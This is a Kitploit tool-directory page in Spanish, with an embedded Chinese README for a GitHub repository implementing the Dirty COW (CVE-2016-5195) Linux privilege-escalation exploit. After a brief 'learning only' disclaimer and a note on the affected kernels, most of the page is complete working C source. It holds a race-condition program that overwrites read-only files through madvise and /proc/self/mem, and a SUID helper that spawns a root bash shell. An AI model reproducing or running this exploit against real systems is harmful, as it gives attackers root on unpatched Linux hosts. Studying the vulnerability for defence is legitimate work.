Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/kongqbin/cve-2016-5195
Escalada de PrivilegiosFrameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónAprendizaje y EducaciónExplotación de Binarios
GitHubkongqbin/cve-2016-5195

CVE-2016-5195

Implementación educativa del exploit de escalada de privilegios Dirty COW (CVE-2016-5195), incluyendo el payload de condición de carrera y la escalada a shell root basada en SUID para sistemas Linux.

Ver Repositorio
21hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

记录仅以学习为目的,禁止用于非法用途

原理

该漏洞的原理是依靠并发刷写脏页,使原本只读权限的文件内容发生变更 如果被修改的文件为root所属且具备SUID权限,那么就可以利用其进行提权

影响范围

  • 在2016年10月前被编译的且版本在2.6.22 到 4.8.3之间的内核,因为2016年10月后的大概率被打补丁了
  • 务必是Ext文件系统,如果是XFS文件系统,就会触发xfs只读页断言,而后系统重启,变成DDos攻击了

工具代码(dirtycow_file_payload.c)

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

void *map;
int f;
struct stat st;
char *name;

// 用于存储从文件中读取的 Payload 内容和大小
char *payload_buf;
size_t payload_size;

// 线程 B:不断调用 madvise 告诉内核丢弃该内存页
void *madviseThread(void *arg) {
	int i, c = 0;
	for(i = 0; i < 10000000; i++) {
		c += madvise(map, payload_size, MADV_DONTNEED);
	}
	printf("[-] madvise 线程结束\n");
	return NULL;
}

// 线程 A:不断通过 /proc/self/mem 向只读映射区写入数据
void *procselfmemThread(void *arg) {
	int f = open("/proc/self/mem", O_RDWR);
	int i, c = 0;
	for(i = 0; i < 10000000; i++) {
		lseek(f, (uintptr_t) map, SEEK_SET);
		// 将内存中的 Payload 缓冲区写入
		c += write(f, payload_buf, payload_size);
	}
	printf("[-] /proc/self/mem 线程结束\n");
	return NULL;
}

int main(int argc, char *argv[]) {
	if (argc < 3) {
		printf("用法: %s <只读目标文件> <Payload输入文件>\n", argv[0]);
		return 1;
	}

	name = argv[1];
	char *payload_file = argv[2];

    // 打开并读取 Payload 文件内容到内存中
	int pf = open(payload_file, O_RDONLY);
	if (pf < 0) {
		perror("打开 Payload 文件失败");
		return 1;
	}
	struct stat pst;
	fstat(pf, &pst);
	payload_size = pst.st_size;

	if (payload_size == 0) {
		printf("[!] Payload 文件为空\n");
		return 1;
	}

	payload_buf = malloc(payload_size);
	if (read(pf, payload_buf, payload_size) != payload_size) {
		perror("读取 Payload 文件失败");
		return 1;
	}
	close(pf);
	printf("[*] 成功加载 Payload 文件: %s (大小: %zu 字节)\n", payload_file, payload_size);

    // 映射目标文件
	f = open(name, O_RDONLY);
	if (f < 0) {
		perror("打开目标文件失败");
		return 1;
	}
	fstat(f, &st);

	// 防止 Payload 长度大于目标文件长度
	if (payload_size > st.st_size) {
		printf("[!] 警告: Payload 大小 (%zu) 大于目标文件大小 (%zu)。\n", payload_size, st.st_size);
		printf("[!] 根据 Dirty COW 的就地覆盖特性,超出目标文件大小的部分将被文件系统截断丢弃!\n");
	}

	map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
	printf("[*] 目标文件映射地址: %p\n", map);

    // 启动条件竞争
	pthread_t pth1, pth2;
	printf("[*] 启动条件竞争 (Race Condition)...\n");
	pthread_create(&pth1, NULL, madviseThread, NULL);
	pthread_create(&pth2, NULL, procselfmemThread, NULL);

	pthread_join(pth1, NULL);
	pthread_join(pth2, NULL);

	printf("[*] 竞争结束,请检查 %s 的内容。\n", name);
	free(payload_buf);
	return 0;
}

提权代码(up.c)

#include <unistd.h>
int main() {
	// 恢复 root 身份
	setuid(0);
	setgid(0);
	// 弹出 root bash
	execl("/bin/bash", "bash", NULL);
	return 0;
}
Descargar herramienta